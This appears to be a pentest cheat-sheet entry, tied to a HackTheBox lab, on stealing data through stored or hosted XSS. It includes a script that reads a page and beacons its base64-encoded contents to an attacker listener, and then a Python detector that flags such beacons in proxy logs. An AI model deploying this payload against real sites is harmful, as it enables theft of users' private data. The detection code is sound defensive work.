Data Exfiltration
Stored / Hosted XSS
If the target page has a loose Content Security Policy or cross-origin policy, you may be able to host xss.js on your own machine with a Python web server and have the victim's browser execute it, reading the resource at url.
If there is a stored XSS vulnerability that lets you place this script on the target itself, the script is served from a trusted (same-origin) location, and the victim's browser executes it and reads the resource at url the same way.
The response body is then base64-encoded and sent back to the attacker as the query string of a request to the /data URL.
See https://benheater.com/hackthebox-alert/ for a worked example.
xss.js

<script>
  // Resource on the vulnerable origin whose contents will be read.
  var url = "http://domain.tld/secret.txt";
  // Attacker-controlled listener that receives the beacon.
  var attacker = "http://10.10.14.165/data";
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      // Base64-encode the response body and send it as the query string.
      fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)));
    }
  };
  xhr.open('GET', url, true);
  xhr.send(null);
</script>
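A detection-side example, added here and not part of the original notes: it scans constructed proxy-log lines for requests to hosts outside an allow-list whose query string is one bare base64 blob that decodes to readable text, which is exactly the shape of the /data beacon above. The log format, host names and allow-list are assumptions.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed sample proxy log lines (not from the original page):
# "<client> <method> <url> <status>". The second line mimics the /data beacon.
SAMPLE_LOG = """\
10.0.0.5 GET http://intranet.example/index.html 200
10.0.0.5 GET http://203.0.113.9/data?VGhpcyBpcyB0aGUgc2VjcmV0IHBhZ2Ugc291cmNlLg== 200
10.0.0.7 GET http://intranet.example/api?id=42 200
10.0.0.5 GET http://cdn.example/lib.js?v=abc123 200
"""

# Assumed allow-list of hosts the browser is expected to talk to.
ALLOWED_HOSTS = {"intranet.example", "cdn.example"}
MIN_BLOB_LEN = 24  # shorter blobs are too likely to be ordinary tokens

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def decode_b64_query(query: str):
    """Return the decoded text if the whole query string is one base64 blob
    that decodes to readable text, otherwise None."""
    # A '+' inside base64 is often logged as a space once form-decoded.
    blob = unquote(query).replace(" ", "+")
    if len(blob) < MIN_BLOB_LEN or not B64_RE.fullmatch(blob):
        return None
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def find_exfil(log: str):
    """Flag requests to non-allow-listed hosts carrying a base64 payload."""
    hits = []
    for line in log.splitlines():
        client, _method, url, _status = line.split()
        parts = urlsplit(url)
        if parts.hostname in ALLOWED_HOSTS:
            continue
        decoded = decode_b64_query(parts.query)
        if decoded is not None:
            hits.append((client, parts.hostname, decoded))
    return hits


if __name__ == "__main__":
    for client, host, text in find_exfil(SAMPLE_LOG):
        print(f"{client} -> {host}: {text!r}")
```

Ordinary query strings such as id=42 or v=abc123 fail the single-blob check, so only the beacon to the unlisted host is reported.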